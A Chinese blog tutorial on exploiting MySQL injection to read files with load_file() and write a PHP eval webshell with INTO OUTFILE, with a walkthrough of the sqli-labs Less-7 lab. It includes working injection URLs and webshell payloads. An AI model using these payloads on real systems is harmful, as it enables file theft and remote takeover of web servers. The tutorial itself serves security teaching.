百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

web安全之SQL注入文件操作

bigegpt 2024-08-12 14:10 2 浏览

这一节我们介绍下利用mysql注入进行文件操作的方法,通常用来写shell。

利用条件

  • 需要知道mysql启动参数secure-file-priv,该参数的主要目的就是限制LOAD DATA INFILE或者SELECT INTO OUTFILE之类文件的目录位置,当设置为“NULL”时,不允许mysql导入导出,若指定了路径,则导入导出只能发生在指定的路径下,若为空,则可任意导入导出。
  • 在mysql 5.5.34版本默认为空可以加载文件,但是之后版本为NULL会禁用该函数。

利用方式

  • 导出文件

假设要导出文件“c:\windows\win.ini”,可以按如下写法,支持直接文件路径,或者转换成16进制,或者利用ASCII转字符方式等等

select load_file("c://windows/win.ini");
select load_file(0x633A2F2F77696E646F77732F77696E2E696E69);
select load_file(char(99,58,47,47,119,105,110,100,111,119,115,47,119,105,110,46,105,110,105 ));
  • 写入到文件

语法如下,例如将一句话木马写入到php文件

select “<?php @eval($_POST[‘cmd’]))?>” into outfile “C:\\phpstudy\\www\\111.php”

也可以利用在By后面接16进制文件内容的方法(该手段也是sqlmap上传文件的手法)

Select version() into outfile “C:\\phpstudy\\www\222.php” LINES TERMINATED BY 0xabc

也可以将读写文件放在一起利用

select load_file(“C:\\mysql\\my.ini”) into oufile “C:\\phpstudy\\www\\123.php”

查看权限

注意还是在前面利用条件里提的必须得有file权限才行,需要知道mysql启动参数secure-file-priv,该参数的主要目的就是限制LOAD DATA INFILE或者SELECT INTO OUTFILE之类文件的目录位置,当设置为“NULL”时,不允许mysql导入导出,若指定了路径,则导入导出只能发生在指定的路径下,若为空,则可任意导入导出。

利用 select @@global.secure_file_priv 可以查看当前secure_file_priv参数,如下当为NULL时,禁止导入导出,执行会报错

可以在mysql的配置文件mysql-ini中进行更改

案例测试

  • 首先测试注入,单引号报错,判断后台逻辑

通过测试推测后台逻辑应该为:SELECT * FROM users WHERE id=(('$id')) limit 0,1,如下图闭合验证,方法可参考web安全之SQL注入关联知识点

  • 构造写文件
http://192.168.102.135/ctf/sqli/Less-7/index.php?id=-1')) union select 1,2,3 into outfile "C:\\software\\phpstudy\\WWW\\ctf\\sqli\\Less-7\\1.txt"--+

验证文件存在,说明写入成功

进一步可写shell

http://192.168.102.135/ctf/sqli/Less-7/index.php?id=-1')) union select 1,2,"<?php @eval($_POST['c']);?>" into outfile "C:\\software\\phpstudy\\WWW\\ctf\\sqli\\Less-7\\2.php"--+

小结

本节内容到此为止,相对比较容易理解,主要是权限问题。

相关推荐

了解Linux目录,那你就了解了一半的Linux系统

大到公司或者社群再小到个人要利用Linux来开发产品的人实在是多如牛毛,每个人都用自己的标准来配置文件或者设置目录,那么未来的Linux则就是一团乱麻,也对管理造成许多麻烦。后来,就有所谓的FHS(F...

Linux命令,这些操作要注意!(linux命令?)

刚玩Linux的人总觉得自己在演黑客电影,直到手滑输错命令把公司服务器删库,这才发现命令行根本不是随便乱用的,而是“生死簿”。今天直接上干货,告诉你哪些命令用好了封神!喜欢的一键三连,谢谢观众老爷!!...

Linux 命令速查手册:这 30 个高频指令,拯救 90% 的运维小白!

在Linux系统的世界里,命令行是强大的武器。对于运维小白而言,掌握一些高频使用的Linux命令,能极大提升工作效率,轻松应对各种系统管理任务。今天,就为大家奉上精心整理的30个Linu...

linux必学的60个命令(linux必学的20个命令)

以下是Linux必学的20个基础命令:1.cd:切换目录2.ls:列出文件和目录3.mkdir:创建目录4.rm:删除文件或目录5.cp:复制文件或目录6.mv:移动/重命名文件或目录7....

提高工作效率的--Linux常用命令,能够决解95%以上的问题

点击上方关注,第一时间接受干货转发,点赞,收藏,不如一次关注评论区第一条注意查看回复:Linux命令获取linux常用命令大全pdf+Linux命令行大全pdf为什么要学习Linux命令?1、因为Li...

15 个实用 Linux 命令(linux命令用法及举例)

Linux命令行是系统管理员、开发者和技术爱好者的强大工具。掌握实用命令不仅能提高效率,还能解锁Linux系统的无限潜力,本文将深入介绍15个实用Linux命令。ls-列出目录内容l...

Linux 常用命令集合(linux常用命令全集)

系统信息arch显示机器的处理器架构(1)uname-m显示机器的处理器架构(2)uname-r显示正在使用的内核版本dmidecode-q显示硬件系统部件-(SMBIOS/DM...

Linux的常用命令就是记不住,怎么办?

1.帮助命令1.1help命令#语法格式:命令--help#作用:查看某个命令的帮助信息#示例:#ls--help查看ls命令的帮助信息#netst...

Linux常用文件操作命令(linux常用文件操作命令有哪些)

ls命令在Linux维护工作中,经常使用ls这个命令,这是最基本的命令,来写几条常用的ls命令。先来查看一下使用的ls版本#ls--versionls(GNUcoreutils)8.4...

Linux 常用命令(linux常用命令)

日志排查类操作命令查看日志cat/var/log/messages、tail-fxxx.log搜索关键词grep"error"xxx.log多条件过滤`grep-E&#...

简单粗暴收藏版:Linux常用命令大汇总

号主:老杨丨11年资深网络工程师,更多网工提升干货,请关注公众号:网络工程师俱乐部下午好,我的网工朋友在Linux系统中,命令行界面(CLI)是管理员和开发人员最常用的工具之一。通过命令行,用户可...

「Linux」linux常用基本命令(linux常用基本命令和用法)

Linux中许多常用命令是必须掌握的,这里将我学linux入门时学的一些常用的基本命令分享给大家一下,希望可以帮助你们。总结送免费学习资料(包含视频、技术学习路线图谱、文档等)1、显示日期的指令:d...

Linux的常用命令就是记不住,怎么办?于是推出了这套教程

1.帮助命令1.1help命令#语法格式:命令--help#作用:查看某个命令的帮助信息#示例:#ls--help查看ls命令的帮助信息#netst...

Linux的30个常用命令汇总,运维大神必掌握技能!

以下是Linux系统中最常用的30个命令,精简版覆盖日常操作核心需求,适合快速掌握:一、文件/目录操作1.`ls`-列出目录内容`ls-l`(详细信息)|`ls-a`(显示隐藏文件)...

Linux/Unix 系统中非常常用的命令

Linux/Unix系统中非常常用的命令,它们是进行文件操作、文本处理、权限管理等任务的基础。下面是对这些命令的简要说明:**文件操作类:*****`ls`(list):**列出目录内容,显...